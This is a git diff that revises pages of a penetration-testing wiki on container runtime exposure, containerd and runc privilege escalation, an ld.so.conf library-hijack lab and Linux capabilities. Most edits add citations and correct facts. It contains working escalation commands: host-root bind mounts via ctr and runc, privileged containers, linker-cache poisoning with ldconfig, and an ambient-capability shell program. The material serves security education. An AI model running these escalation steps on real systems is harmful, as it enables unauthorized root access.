+- [13] [Cobalt Strike: SOCKS Proxy](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/pivoting_socks-proxy.htm)
+- [14] [Cobalt Strike: Reverse Port Forward](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/pivoting_reverse-port-forward.htm)
+- [15] [reGeorg README](https://raw.githubusercontent.com/sensepost/reGeorg/master/README.md)
+- [16] [Chisel README](https://raw.githubusercontent.com/jpillora/chisel/master/README.md)
+- [17] [Ligolo-ng Quickstart](https://docs.ligolo.ng/Quickstart/)
+- [18] [Ligolo-ng Listeners](https://docs.ligolo.ng/Listeners/)
+- [19] [Ligolo-ng Localhost](https://docs.ligolo.ng/Localhost/)
+- [20] [rpivot README](https://raw.githubusercontent.com/klsecservices/rpivot/master/README.md)
+- [21] [socat manual](https://man7.org/linux/man-pages/man1/socat.1.html)
+- [22] [PuTTY Plink manual](https://the.earth.li/~sgtatham/putty/0.84/htmldoc/Chapter7.html)
+- [23] [PuTTY command-line options](https://the.earth.li/~sgtatham/putty/0.84/htmldoc/Chapter3.html)
+- [24] [Microsoft netsh interface portproxy command](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-interface)
+- [25] [SocksOverRDP README](https://raw.githubusercontent.com/nccgroup/SocksOverRDP/master/README.md)
+- [26] [Proxifier documentation](https://www.proxifier.com/docs/win-v4/)
+- [27] [Proxifier Proxification Rules](https://www.proxifier.com/docs/win-v3/rules.htm)
+- [28] [OpenVPN 2.7 manual](https://openvpn.net/community-docs/community-articles/openvpn-2-7-manual.html)
+- [29] [Cntlm](https://cntlm.sourceforge.net/)
+- [30] [YARP README](https://raw.githubusercontent.com/dotnet/yarp/main/README.md)
+- [31] [iodine README](https://code.kryo.se/iodine/README.html)
+- [32] [dnscat2 README](https://raw.githubusercontent.com/iagox86/dnscat2/master/README.md)
+- [33] [dnscat2-powershell README](https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/README.md)
+- [34] [proxychains-ng README](https://raw.githubusercontent.com/rofl0r/proxychains-ng/master/README)
+- [35] [proxyresolv](https://github.com/haad/proxychains/blob/master/src/proxyresolv)
+- [36] [RFC 1035: Domain Names - Implementation and Specification](https://www.rfc-editor.org/rfc/rfc1035)
+- [37] [Hans](https://code.gerade.org/hans/)
+- [38] [ptunnel-ng README](https://raw.githubusercontent.com/utoni/ptunnel-ng/master/README.md)
+- [39] [ngrok Agent CLI](https://ngrok.com/docs/agent/cli)
+- [40] [ngrok Web Inspection Interface](https://ngrok.com/docs/agent/web-inspection-interface)
+- [41] [ngrok virtual hosts](https://ngrok.com/docs/using-ngrok-with/virtualHosts)
+- [42] [ngrok Agent Config v2](https://ngrok.com/docs/agent/config/v2)
+- [43] [Cloudflare Tunnel overview](https://developers.cloudflare.com/tunnel/)
+- [44] [Cloudflare Tunnel origin parameters](https://developers.cloudflare.com/tunnel/advanced/origin-parameters/)
+- [45] [Cloudflare Tunnel setup](https://developers.cloudflare.com/tunnel/setup/)
+- [46] [Cloudflare Tunnel configuration file](https://developers.cloudflare.com/cloudflare-one/networks/connectors/cloudflare-tunnel/do-more-with-tunnels/local-management/configuration-file/)
+- [47] [Cloudflare Tunnel run parameters](https://developers.cloudflare.com/tunnel/advanced/run-parameters/)
+- [48] [frp concepts](https://gofrp.org/en/docs/concepts/)
+- [49] [frp XTCP](https://gofrp.org/en/docs/features/xtcp/)
+- [50] [frp SSH Tunnel Gateway](https://gofrp.org/en/docs/features/common/ssh/)
+- [51] [QEMU networking documentation](https://www.qemu.org/docs/master/system/devices/net.html)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/linux-hardening/containers-namespaces/container-security/README.md
+++ b/src/linux-hardening/containers-namespaces/container-security/README.md
@@ -1,7 +1,5 @@
 # Container Security
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## What A Container Actually Is
 
 A practical way to define a container is this: a container is a **regular Linux process tree** that has been started under a specific OCI-style configuration so that it sees a controlled filesystem, a controlled set of kernel resources, and a restricted privilege model. The process may believe it is PID 1, may believe it has its own network stack, may believe it owns its own hostname and IPC resources, and may even run as root inside its own user namespace. But under the hood it is still a host process that the kernel schedules like any other.

--- a/src/linux-hardening/containers-namespaces/container-security/authorization-plugins.md
+++ b/src/linux-hardening/containers-namespaces/container-security/authorization-plugins.md
@@ -1,7 +1,5 @@
 # Runtime Authorization Plugins
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Overview
 
 Runtime authorization plugins are an extra policy layer that decides whether a caller may perform a given daemon action. Docker is the classic example. By default, anyone who can talk to the Docker daemon effectively has broad control over it. Authorization plugins try to narrow that model by examining the authenticated user and the requested API operation, then allowing or denying the request according to policy.

--- a/src/linux-hardening/containers-namespaces/container-security/runtime-api-and-daemon-exposure.md
+++ b/src/linux-hardening/containers-namespaces/container-security/runtime-api-and-daemon-exposure.md
@@ -1,7 +1,5 @@
 # Runtime API And Daemon Exposure
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Overview
 
 Many real container compromises do not begin with a namespace escape at all. They begin with access to the runtime control plane. If a workload can talk to `dockerd`, `containerd`, CRI-O, Podman, or kubelet through a mounted Unix socket or an exposed TCP listener, the attacker may be able to request a new container with better privileges, mount the host filesystem, join host namespaces, or retrieve sensitive node information. In those cases, the runtime API is the real security boundary, and compromising it is functionally close to compromising the host.
@@ -199,7 +197,6 @@ If the kubelet or API-server proxy path authorizes `exec`, a WebSocket-capable c
 The goal of these checks is to answer whether the container can reach any management plane that should have remained outside the trust boundary.
 
 ```bash
-find / -maxdepth 3 \( -name docker.sock -o -name containerd.sock -o -name crio.sock -o -name podman.sock -o -name kubelet.sock \) 2>/dev/null
 mount | grep -E '/var/run|/run|docker.sock|containerd.sock|crio.sock|podman.sock|kubelet.sock'
 ss -lntp 2>/dev/null | grep -E ':2375|:2376'
 env | grep -E 'DOCKER_HOST|CONTAINERD_ADDRESS|CRI_CONFIG_FILE|BUILDKIT_HOST|XDG_RUNTIME_DIR'

--- a/src/linux-hardening/containers-namespaces/container-security/runtimes-and-engines.md
+++ b/src/linux-hardening/containers-namespaces/container-security/runtimes-and-engines.md
@@ -1,7 +1,5 @@
 # Container Runtimes, Engines, Builders, And Sandboxes
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 One of the biggest sources of confusion in container security is that several completely different components are often collapsed into the same word. "Docker" might refer to an image format, a CLI, a daemon, a build system, a runtime stack, or simply the idea of containers in general. For security work, that ambiguity is a problem, because different layers are responsible for different protections. A breakout caused by a bad bind mount is not the same thing as a breakout caused by a low-level runtime bug, and neither is the same thing as a cluster policy mistake in Kubernetes.
 
 This page separates the ecosystem by role so that the rest of the section can talk precisely about where a protection or weakness actually lives.

--- a/src/linux-hardening/containers-namespaces/containerd-ctr-privilege-escalation.md
+++ b/src/linux-hardening/containers-namespaces/containerd-ctr-privilege-escalation.md
@@ -1,7 +1,5 @@
 # Containerd (ctr) Privilege Escalation
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Basic information
 
 Go to the following link to learn **where `containerd` and `ctr` fit in the container stack**:
@@ -12,14 +10,14 @@ container-security/runtimes-and-engines.md
 
 ## PE 1
 
-if you find that a host contains the `ctr` command:
+If you find that a host contains the `ctr` command, the native CLI bundled with containerd:<sup>[[1]](#references)</sup>
 
 ```bash
 which ctr
 /usr/bin/ctr
 ```
 
-You can list the images:
+You can list the images known to containerd:<sup>[[2]](#references)</sup>
 
 ```bash
 ctr image list
@@ -28,7 +26,7 @@ registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json
 registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
 ```
 
-And then **run one of those images mounting the host root folder to it**:
+Then **run one of those images with the host root recursively bind-mounted at the container root**:<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
@@ -36,17 +34,26 @@ ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:late
 
 ## PE 2
 
-Run a container privileged and escape from it.\
-You can run a privileged container as:
+Run a container in privileged mode and test for an escape.\
+You can run a privileged container using host networking as:<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```bash
  ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
 ```
 
-Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**:
+`--privileged` grants the process the caller's effective Linux capabilities and removes several isolation controls, but an escape remains environment-dependent; use the techniques mentioned in the following page to test for it:<sup>[[5]](#references)</sup>
 
 {{#ref}}
 container-security/
 {{#endref}}
+
+## References
+
+- [1] [Getting started with containerd](https://github.com/containerd/containerd/blob/main/docs/getting-started.md)
+- [2] [ctr image command implementation](https://github.com/containerd/containerd/blob/main/cmd/ctr/commands/images/images.go)
+- [3] [ctr run command implementation](https://github.com/containerd/containerd/blob/main/cmd/ctr/commands/run/run.go)
+- [4] [Linux kernel shared-subtree documentation](https://docs.kernel.org/filesystems/sharedsubtree.html)
+- [5] [containerd OCI package: `WithPrivileged`](https://pkg.go.dev/github.com/containerd/containerd%40v1.7.33/oci)
+- [6] [containerd `ctr` command flags](https://github.com/containerd/containerd/blob/main/cmd/ctr/commands/commands.go)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/containers-namespaces/runc-privilege-escalation.md
+++ b/src/linux-hardening/containers-namespaces/runc-privilege-escalation.md
@@ -1,7 +1,5 @@
 # RunC Privilege Escalation
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Basic information
 
 If you want to learn more about **runc** check the following page:
@@ -12,7 +10,7 @@ If you want to learn more about **runc** check the following page:
 
 ## PE
 
-If you find that `runc` is installed in the host you may be able to **run a container mounting the root / folder of the host**.
+If `runc` is available to a rootful process on the host, you can use an OCI bundle whose mount configuration recursively bind-mounts the host's `/` at `/` inside the container, exposing the host filesystem in that mount namespace.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 runc -help #Get help and see if runc is intalled
@@ -39,6 +37,12 @@ runc run demo
 ```
 
 > [!CAUTION]
-> This won't always work as the default operation of runc is to run as root, so running it as an unprivileged user simply cannot work (unless you have a rootless configuration). Making a rootless configuration the default isn't generally a good idea because there are quite a few restrictions inside rootless containers that don't apply outside rootless containers.
+> The documented `runc run` workflow is rootful: runc's own examples label it "run as root." An unprivileged user needs a rootless configuration such as `runc spec --rootless`, and runc documents that user namespaces must be enabled for that mode.<sup>[[1]](#references)</sup>
+
+## References
+
+- [1] [runc: CLI tool for spawning and running containers](https://github.com/opencontainers/runc#using-runc)
+- [2] [OCI Runtime Specification: Mounts](https://github.com/opencontainers/runtime-spec/blob/main/config.md#mounts)
+- [3] [Shared Subtrees](https://docs.kernel.org/filesystems/sharedsubtree.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/interesting-files-permissions/ld.so.conf-example.md
+++ b/src/linux-hardening/interesting-files-permissions/ld.so.conf-example.md
@@ -1,7 +1,5 @@
 # ld.so privesc exploit example
 
-{{#include ../../banners/hacktricks-training.md}}
-
 This page is a focused lab for poisoning the **system linker cache through `/etc/ld.so.conf` or `ldconfig`**. For missing-library injection, writable `RPATH`/`RUNPATH`, `LD_PRELOAD`, and other generic SUID linker abuse, see [SUID Shared Library and Linker Abuse](suid-shared-library-and-linker-abuse.md).
 
 ## Prepare the environment
@@ -71,7 +69,7 @@ Hi
 
 ### Useful triage commands
 
-When attacking a real target, verify the **exact library name** the binary needs, what the loader is **currently resolving**, and which configured paths are writable without mutating the live cache.<sup>[[1]](#references)[[2]](#references)</sup>
+When attacking a real target, verify the **exact library name** the binary needs, what the loader is **currently resolving**, and which configured paths are writable without mutating the live cache.<sup>[[1]](#references)[[2]](#references)[[5]](#references)</sup>
 
 ```bash
 # Needed SONAME and program interpreter
@@ -99,15 +97,16 @@ A couple of useful gotchas:
 - `sudo echo ... > /etc/ld.so.conf.d/x.conf` usually **doesn't work** because
   the redirection is done by your current shell. Use
   `echo "/home/ubuntu/lib" | sudo tee /etc/ld.so.conf.d/privesc.conf` instead.
-- **SUID/privileged** binaries ignore `LD_LIBRARY_PATH`/`LD_PRELOAD` in
-  **secure-execution mode**, but directories coming from `/etc/ld.so.conf` are
-  still part of the trusted loader configuration, so this misconfiguration can
-  still affect privileged programs.<sup>[[1]](#references)</sup>
+- **SUID/privileged** binaries run in **secure-execution mode**: `LD_LIBRARY_PATH`
+  is ignored, while `LD_PRELOAD` is restricted (slash-containing names are
+  ignored, and only setuid-marked libraries in standard directories may be
+  preloaded). Once root runs `ldconfig`, directories listed in
+  `/etc/ld.so.conf` can enter `/etc/ld.so.cache`, so this misconfiguration can
+  still affect privileged programs.<sup>[[1]](#references)[[2]](#references)</sup>
 - `LD_DEBUG` is also ignored in secure-execution mode unless `/etc/suid-debug` exists, so collect its trace from an equivalent non-SUID run rather than expecting output from the privileged execution.<sup>[[1]](#references)</sup>
-- On newer glibc versions, the dynamic loader also exposes
-  `--list-diagnostics`, which is handy to debug cache resolution and
-  `glibc-hwcaps` subdirectory selection when a hijack doesn't behave as
-  expected.<sup>[[1]](#references)</sup>
+- On glibc 2.33 and newer, the dynamic loader also exposes
+  `--list-diagnostics`, which prints machine-readable loader diagnostics and
+  built-in search-path information when a hijack doesn't behave as expected.<sup>[[1]](#references)[[6]](#references)</sup>
 
 ### Cache and SONAME constraints
 
@@ -124,7 +123,9 @@ Prefer a target-specific library such as this example. Shadowing a common SONAME
 
 ## Exploit
 
-In this scenario we are going to suppose that **someone has created a vulnerable entry** inside a file in _/etc/ld.so.conf/_:
+In this scenario, suppose an administrator has added a vulnerable entry to a
+file under `/etc/ld.so.conf.d/` that is included by the system's
+`/etc/ld.so.conf`.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 echo "/home/ubuntu/lib" | sudo tee /etc/ld.so.conf.d/privesc.conf
@@ -205,12 +206,12 @@ The current glibc hardening guidance recommends avoiding duplicate SONAMEs, non-
 ### Other misconfigurations - Same vuln
 
 In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.\
-But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it.
+But there are other misconfigurations that can cause the same vulnerability: if you have **write permissions** in a loaded **config file**, can create a file in a writable `/etc/ld.so.conf.d/` directory, or can write to `/etc/ld.so.conf`, you can configure and exploit the same vulnerability.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Exploit 2
 
 **Suppose you have sudo privileges over `ldconfig`**.\
-You can indicate `ldconfig` **where to load the conf files from**, so we can take advantage of it to make `ldconfig` load arbitrary folders.<sup>[[2]](#references)</sup>\
+You can indicate `ldconfig` **which configuration file to read** with `-f`, so a file that names attacker-controlled directories can make `ldconfig` add those folders to the cache.<sup>[[2]](#references)</sup>\
 So, lets create the files and folders needed to load "/tmp":
 
 ```bash
@@ -244,4 +245,6 @@ ldd sharedvuln
 - [2] [ldconfig(8) - Linux manual page](https://man7.org/linux/man-pages/man8/ldconfig.8.html)
 - [3] [Dynamic Linker Hardening - The GNU C Library](https://sourceware.org/glibc/manual/latest/html_node/Dynamic-Linker-Hardening.html)
 - [4] [ldd(1) - Linux manual page](https://man7.org/linux/man-pages/man1/ldd.1.html)
+- [5] [readelf (GNU Binary Utilities)](https://www.sourceware.org/binutils/docs/binutils/readelf.html)
+- [6] [Dynamic Linker Diagnostics (The GNU C Library)](https://sourceware.org/glibc/manual/latest/html_node/Dynamic-Linker-Diagnostics.html)
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/interesting-files-permissions/linux-capabilities.md
+++ b/src/linux-hardening/interesting-files-permissions/linux-capabilities.md
@@ -1,23 +1,20 @@
 # Linux Capabilities
 
-{{#include ../../banners/hacktricks-training.md}}
-
-
-## Linux Capabilities
-
-Linux capabilities divide **root privileges into smaller, distinct units**, allowing processes to have a subset of privileges. This minimizes the risks by not granting full root privileges unnecessarily.<sup>[[5]](#references)</sup>
+Linux capabilities divide **root privileges into smaller, distinct units**, allowing processes to have a subset of privileges. This minimizes the risks by not granting full root privileges unnecessarily.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[14]](#references)</sup>
 
 ### The Problem:
 
-- Normal users have limited permissions, affecting tasks like opening a network socket which requires root access.
+- Normal users have limited permissions for operations such as opening raw sockets or binding Internet ports below 1024; capabilities can grant only the required operation instead of full root privilege.<sup>[[14]](#references)</sup>
 
 ### Capability Sets:
 
+Linux exposes these capability sets per thread, and the kernel applies their constraints when a process changes credentials or executes a file.<sup>[[14]](#references)</sup>
+
 1. **Inherited (CapInh)**:
 
-   - **Purpose**: Determines the capabilities passed down from the parent process.
-   - **Functionality**: When a new process is created, it inherits the capabilities from its parent in this set. Useful for maintaining certain privileges across process spawns.
-   - **Restrictions**: A process cannot gain capabilities that its parent did not possess.<sup>[[3]](#references)</sup>
+   - **Purpose**: Identifies capabilities that may contribute to the permitted set after `execve()` when the executed file has matching inheritable file capabilities.
+   - **Functionality**: The thread's inheritable set is preserved across `execve()`; it does not make those capabilities effective by itself.
+   - **Restrictions**: Adding a capability to this set is constrained by the permitted and bounding sets.<sup>[[14]](#references)</sup>
 
 2. **Effective (CapEff)**:
 
@@ -29,46 +26,36 @@ Linux capabilities divide **root privileges into smaller, distinct units**, allo
 
    - **Purpose**: Defines the maximum set of capabilities a process can possess.
    - **Functionality**: A process can elevate a capability from the permitted set to its effective set, giving it the ability to use that capability. It can also drop capabilities from its permitted set.
-   - **Boundary**: It acts as an upper limit for the capabilities a process can have, ensuring a process doesn't exceed its predefined privilege scope.
+   - **Boundary**: If a capability is dropped from this set, it cannot normally be restored without executing a file that grants it or another privileged transition.<sup>[[14]](#references)</sup>
 
 4. **Bounding (CapBnd)**:
 
-   - **Purpose**: Puts a ceiling on the capabilities a process can ever acquire during its lifecycle.
-   - **Functionality**: Even if a process has a certain capability in its inheritable or permitted set, it cannot acquire that capability unless it's also in the bounding set.
-   - **Use-case**: This set is particularly useful for restricting a process's privilege escalation potential, adding an extra layer of security.
+   - **Purpose**: Limits the capabilities a process can gain from a file during `execve()` and those it can add to its inheritable set.
+   - **Functionality**: The set is inherited across `fork()` and preserved across `execve()`; capabilities can be dropped from it when the caller has `CAP_SETPCAP`.
+   - **Use-case**: Removing unnecessary capabilities from this set limits later privilege acquisition.<sup>[[14]](#references)</sup>
 
 5. **Ambient (CapAmb)**:
-   - **Purpose**: Allows certain capabilities to be maintained across an `execve` system call, which typically would result in a full reset of the process's capabilities.
-   - **Functionality**: Ensures that non-SUID programs that don't have associated file capabilities can retain certain privileges.
-   - **Restrictions**: Capabilities in this set are subject to the constraints of the inheritable and permitted sets, ensuring they don't exceed the process's allowed privileges.<sup>[[8]](#references)[[9]](#references)</sup>
-
-```python
-# Code to demonstrate the interaction of different capability sets might look like this:
-# Note: This is pseudo-code for illustrative purposes only.
-def manage_capabilities(process):
-    if process.has_capability('cap_setpcap'):
-        process.add_capability_to_set('CapPrm', 'new_capability')
-    process.limit_capabilities('CapBnd')
-    process.preserve_capabilities_across_execve('CapAmb')
-```
+   - **Purpose**: Allows selected capabilities to remain permitted and effective across `execve()` of a nonprivileged program.
+   - **Functionality**: Ambient capabilities are added to the new permitted and effective sets when the executed file is not privileged.
+   - **Restrictions**: A capability can be ambient only while it is present in both the permitted and inheritable sets; executing a set-user-ID/set-group-ID file or a file with capabilities clears the ambient set.<sup>[[8]](#references)[[9]](#references)[[14]](#references)</sup>
 
 ## Processes & Binaries Capabilities
 
 ### Processes Capabilities
 
 To see the capabilities for a particular process, use the **status** file in the /proc directory. As it provides more details, let’s limit it only to the information related to Linux capabilities.\
-Note that for all running processes capability information is maintained per thread, for binaries in the file system it’s stored in extended attributes.<sup>[[4]](#references)</sup>
+Note that for all running processes capability information is maintained per thread, while file capabilities are stored in `security.capability` extended attributes.<sup>[[14]](#references)[[15]](#references)</sup>
 
 You can find the capabilities defined in /usr/include/linux/capability.h
 
-You can find the capabilities of the current process in `cat /proc/self/status` or doing `capsh --print` and of other users in `/proc/<pid>/status`
+You can find the capabilities of the current process in `cat /proc/self/status` or with `capsh --print`, and those of other processes in `/proc/<pid>/status`.<sup>[[15]](#references)[[26]](#references)</sup>
 
 ```bash
 cat /proc/1234/status | grep Cap
 cat /proc/$$/status | grep Cap #This will print the capabilities of the current process
 ```
 
-This command should return 5 lines on most systems.
+This command should return five capability lines on most systems.<sup>[[15]](#references)</sup>
 
 - CapInh = Inherited capabilities
 - CapPrm = Permitted capabilities
@@ -85,7 +72,7 @@ CapBnd: 0000003fffffffff
 CapAmb: 0000000000000000
 ```
 
-These hexadecimal numbers don’t make sense. Using the capsh utility we can decode them into the capabilities name.
+These hexadecimal numbers don’t make sense. Using the `capsh` utility, we can decode them into capability names.<sup>[[26]](#references)</sup>
 
 ```bash
 capsh --decode=0000003fffffffff
@@ -106,13 +93,13 @@ capsh --decode=0000000000003000
 0x0000000000003000=cap_net_admin,cap_net_raw
 ```
 
-Although that works, there is another and easier way. To see the capabilities of a running process, simply use the **getpcaps** tool followed by its process ID (PID). You can also provide a list of process IDs.
+Although that works, there is another and easier way. To see the capabilities of a running process, use the **getpcaps** tool followed by its process ID (PID); it also accepts a list of process IDs.<sup>[[22]](#references)</sup>
 
 ```bash
 getpcaps 1234
 ```
 
-Lets check here the capabilities of `tcpdump` after having giving the binary enough capabilities (`cap_net_admin` and `cap_net_raw`) to sniff the network (_tcpdump is running in process 9562_):
+Lets check the capabilities of `tcpdump` after giving the binary `cap_net_admin` and `cap_net_raw` to sniff the network (`tcpdump` is running in process 9562).<sup>[[22]](#references)[[25]](#references)</sup>
 
 ```bash
 #The following command give tcpdump the needed capabilities to sniff traffic
@@ -132,19 +119,18 @@ $ capsh --decode=0000000000003000
 0x0000000000003000=cap_net_admin,cap_net_raw
 ```
 
-As you can see the given capabilities corresponds with the results of the 2 ways of getting the capabilities of a binary.\
-The _getpcaps_ tool uses the **capget()** system call to query the available capabilities for a particular thread. This system call only needs to provide the PID to obtain more information.
+As you can see, the capabilities correspond with the results of the two ways of inspecting a process. The `getpcaps` tool uses libcap to query a target process's capabilities and prints them in text form; it accepts one or more PIDs.<sup>[[22]](#references)</sup>
 
 ### Binaries Capabilities
 
-Binaries can have capabilities that can be used while executing. For example, it's very common to find `ping` binary with `cap_net_raw` capability:
+Binaries can have file capabilities that are applied during execution. For example, a `ping` binary may carry the `cap_net_raw` capability.<sup>[[14]](#references)</sup>
 
 ```bash
 getcap /usr/bin/ping
 /usr/bin/ping = cap_net_raw+ep
 ```
 
-You can **search binaries with capabilities** using:
+You can **search binaries with capabilities** using `getcap -r`.<sup>[[23]](#references)</sup>
 
 ```bash
 getcap -r / 2>/dev/null
@@ -152,7 +138,7 @@ getcap -r / 2>/dev/null
 
 ### Dropping capabilities with capsh
 
-If we drop the CAP*NET_RAW capabilities for \_ping*, then the ping utility should no longer work.
+If we drop `CAP_NET_RAW` from the prevailing bounding set, a program that needs that capability should no longer be able to use it.<sup>[[26]](#references)</sup>
 
 ```bash
 capsh --drop=cap_net_raw --print -- -c "tcpdump"
@@ -162,11 +148,11 @@ Besides the output of _capsh_ itself, the _tcpdump_ command itself should also r
 
 > /bin/bash: /usr/sbin/tcpdump: Operation not permitted
 
-The error clearly shows that the ping command is not allowed to open an ICMP socket. Now we know for sure that this works as expected.
+The error shows that `tcpdump` cannot execute with the requested file capability after `CAP_NET_RAW` was removed from the bounding set.
 
 ### Remove Capabilities
 
-You can remove capabilities of a binary with
+You can remove a file's capabilities with `setcap -r`.<sup>[[25]](#references)</sup>
 
 ```bash
 setcap -r </path/to/binary>
@@ -174,8 +160,7 @@ setcap -r </path/to/binary>
 
 ## User Capabilities
 
-Apparently **it's possible to assign capabilities also to users**. This probably means that every process executed by the user will be able to use the users capabilities.\
-Base on on [this](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [this ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)and [this ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)a few files new to be configured to give a user certain capabilities but the one assigning the capabilities to each user will be `/etc/security/capability.conf`.\
+Linux does not assign file capabilities directly to a login user, but the `pam_cap` PAM module can set inheritable capabilities for authenticated sessions using `/etc/security/capability.conf`.<sup>[[16]](#references)</sup> Each entry maps comma-separated capability names or numbers to one or more usernames.<sup>[[17]](#references)</sup>
 File example:
 
 ```bash
@@ -194,7 +179,7 @@ cap_sys_admin,22,25          jrsysadmin
 
 ## Environment Capabilities
 
-Compiling the following program it's possible to **spawn a bash shell inside an environment that provides capabilities**.
+Compiling the following program makes it possible to **spawn a bash shell inside an environment that provides capabilities**.<sup>[[14]](#references)</sup>
 
 ```c:ambient.c
 /*
@@ -292,7 +277,7 @@ sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
 ./ambient /bin/bash
 ```
 
-Inside the **bash executed by the compiled ambient binary** it's possible to observe the **new capabilities** (a regular user won't have any capability in the "current" section).
+Inside the **bash executed by the compiled ambient binary**, it is possible to observe the **new capabilities** (a regular user will not have any capability in the "current" section).<sup>[[14]](#references)</sup>
 
 ```bash
 capsh --print
@@ -300,16 +285,15 @@ Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip
 ```
 
 > [!CAUTION]
-> You can **only add capabilities that are present** in both the permitted and the inheritable sets.
+> You can **only add capabilities that are present** in both the permitted and the inheritable sets.<sup>[[14]](#references)</sup>
 
 ### Capability-aware/Capability-dumb binaries
 
-The **capability-aware binaries won't use the new capabilities** given by the environment, however the **capability dumb binaries will us**e them as they won't reject them. This makes capability-dumb binaries vulnerable inside a special environment that grant capabilities to binaries.
+A capability-dumb binary is a program with file capabilities that does not use libcap to manage them. If its file effective bit is set, the kernel enables the file's permitted capabilities in the process's effective set; execution can fail if the process did not obtain all permitted capabilities.<sup>[[14]](#references)</sup>
 
 ## Service Capabilities
 
-By default a **service running as root will have assigned all the capabilities**, and in some occasions this may be dangerous.\
-Therefore, a **service configuration** file allows to **specify** the **capabilities** you want it to have, **and** the **user** that should execute the service to avoid running a service with unnecessary privileges:
+A system service that runs as root may retain broad capabilities unless its execution environment restricts them. In a systemd unit, `User=` selects the service user and `AmbientCapabilities=` adds named capabilities to the ambient set for the executed process.<sup>[[18]](#references)</sup>
 
 ```bash
 [Service]
@@ -319,7 +303,7 @@ AmbientCapabilities=CAP_NET_BIND_SERVICE
 
 ## Capabilities in Docker Containers
 
-By default Docker assigns a few capabilities to the containers. It's very easy to check which capabilities are these by running:
+Docker starts containers with a default capability set that can be changed with `--cap-add` and `--cap-drop`; an example container can be inspected with `amicontained`.<sup>[[19]](#references)[[24]](#references)</sup>
 
 ```bash
 docker run --rm -it  r.j3ss.co/amicontained bash
@@ -340,7 +324,7 @@ docker run --rm -it  --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained 
 
 Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root.<sup>[[2]](#references)</sup>
 
-You can force capabilities upon programs using `setcap`, and query these using `getcap`:
+You can force file capabilities onto programs with `setcap`, and query them with `getcap`.<sup>[[23]](#references)[[25]](#references)</sup>
 
 ```bash
 #Set Capability
@@ -351,9 +335,9 @@ getcap /sbin/ping
 /sbin/ping = cap_net_raw+ep
 ```
 
-The `+ep` means you’re adding the capability (“-” would remove it) as Effective and Permitted.
+For file-capability text, `+ep` raises the named capability in the effective and permitted sets; `-` lowers the selected flags.<sup>[[21]](#references)</sup>
 
-To identify programs in a system or folder with capabilities:
+To identify programs in a system or folder with capabilities, use `getcap -r`.<sup>[[23]](#references)</sup>
 
 ```bash
 getcap -r / 2>/dev/null
@@ -381,17 +365,11 @@ getcap /usr/sbin/tcpdump
 
 ### The special case of "empty" capabilities
 
-[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that:
-
-1. is not owned by root
-2. has no `SUID`/`SGID` bits set
-3. has empty capabilities set (e.g.: `getcap myelf` returns `myelf =ep`)
-
-then **that binary will run as root**.
+A file can carry an empty capability set (`getcap myelf` returns `myelf =ep`). An empty set grants no capabilities; when combined with a root-owned set-user-ID bit, the program can still change the executing process's effective and saved IDs to 0 without gaining file capabilities. An unowned, non-SUID/SGID file with `=ep` does not run as root.<sup>[[14]](#references)</sup>
 
 ## CAP_SYS_ADMIN
 
-**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** is a highly potent Linux capability, often equated to a near-root level due to its extensive **administrative privileges**, such as mounting devices or manipulating kernel features. While indispensable for containers simulating entire systems, **`CAP_SYS_ADMIN` poses significant security challenges**, especially in containerized environments, due to its potential for privilege escalation and system compromise. Therefore, its usage warrants stringent security assessments and cautious management, with a strong preference for dropping this capability in application-specific containers to adhere to the **principle of least privilege** and minimize the attack surface.
